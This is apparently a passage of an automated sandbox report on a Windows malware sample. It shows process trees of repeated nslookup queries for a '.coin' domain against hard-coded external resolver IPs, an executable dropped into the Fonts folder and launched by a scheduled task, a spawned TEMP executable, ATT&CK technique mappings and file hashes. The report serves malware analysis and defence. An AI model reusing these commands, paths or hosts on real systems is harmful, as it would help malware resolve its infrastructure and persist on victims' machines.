C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 79.124.7.812⤵
- System Location Discovery: System Language Discovery
PID:2892 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 79.124.7.813⤵PID:1840
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 144.76.103.1432⤵PID:2548
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 144.76.103.1433⤵PID:2544
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 5.132.191.1042⤵PID:2924
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 5.132.191.1043⤵
- System Location Discovery: System Language Discovery
PID:2412
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 13.239.157.1772⤵
- System Location Discovery: System Language Discovery
PID:2532 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 13.239.157.1773⤵PID:3056
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 207.148.83.2412⤵PID:2916
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 207.148.83.2413⤵PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 165.227.40.432⤵PID:2160
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 165.227.40.433⤵PID:2880
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 142.4.204.1112⤵PID:2208
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 142.4.204.1113⤵
- System Location Discovery: System Language Discovery
PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 142.4.205.472⤵
- System Location Discovery: System Language Discovery
PID:2324 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 142.4.205.473⤵
- System Location Discovery: System Language Discovery
PID:2304
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 198.100.148.2242⤵
- System Location Discovery: System Language Discovery
PID:1204 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 198.100.148.2243⤵
- System Location Discovery: System Language Discovery
PID:2320
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 159.203.38.1752⤵PID:1976
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 159.203.38.1753⤵
- System Location Discovery: System Language Discovery
PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 66.70.228.1642⤵
- System Location Discovery: System Language Discovery
PID:444 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 66.70.228.1643⤵
- System Location Discovery: System Language Discovery
PID:1892
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 51.254.25.1152⤵PID:2796
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 51.254.25.1153⤵PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 185.84.81.1942⤵
- System Location Discovery: System Language Discovery
PID:1304 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 185.84.81.1943⤵PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 89.40.116.2302⤵
- System Location Discovery: System Language Discovery
PID:1632 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 89.40.116.2303⤵PID:1576
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
C:\Windows\system32\taskeng.exetaskeng.exe {AD2B1402-889B-481C-A042-9788D67970A4} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2340
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\bcvnbib.exe2⤵PID:1856
-
C:\Windows\Fonts\bcvnbib.exeC:\Windows\Fonts\bcvnbib.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1204 -
C:\Windows\TEMP\hentai.exeC:\Windows\TEMP\hentai.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:576
-
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\bcvnbib.exe2⤵PID:1584
-
C:\Windows\Fonts\bcvnbib.exeC:\Windows\Fonts\bcvnbib.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1428 -
C:\Windows\TEMP\hentai.exeC:\Windows\TEMP\hentai.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1396
-
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\bcvnbib.exe2⤵PID:536
-
C:\Windows\Fonts\bcvnbib.exeC:\Windows\Fonts\bcvnbib.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2436 -
C:\Windows\TEMP\hentai.exeC:\Windows\TEMP\hentai.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2580
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:2392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:2620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:1120
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Indicator Removal
1Clear Persistence
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD533332120861d18fbd17fee1025af56dd
SHA1132a3a34c2178a1d6ea110e904ba81dfc7765b6f
SHA2567776bb0e5a62e12498d89cf7f34ef2d1fad3ccef52cbb9d5c62ef492f4e3873d
SHA512ff9aab8f465d060315e998ec0738998506c065f24c3361777bd5b2c7f0fcbe913eb14a71f1ceae30e986bd68989dbdefe00aed9129347cc9435b0c712941e5b1
-
Filesize
9.4MB
MD5c4f55030a31a141d36a80093d73ddf17
SHA1914c50a48a52af7f1d3796222ab9af6538ddde79
SHA2561b93a81d837dff53deefc6d3f93215c5495daf94684b70937140f16cebee66c1
SHA5125f06ffb66f1b5243b6d96c0e22ec0c3c7d488074c68dce4342939338822f44a0fe66db7bf515cdc7de97420a9b2863309a776f0c059953a173cd23ff92269cfb
-
Filesize
69KB
MD5e564dc14ddb5b9c5e1661339b1daed09
SHA1c951eda553db0d816fc79765937112f66976f8d5
SHA2563d06ca12e9d6e3effe5fcbb87ebd16d4e978b9657374e3d0fb3c81725d415a98
SHA51237e69238a07ae617aff72719c15b1503e6c2a94c8fbacc4ca28ebd0d083d93815fd66af83147692ea3449256a5c86a1137d763cff6f21617e8ca80eeb4d91d2e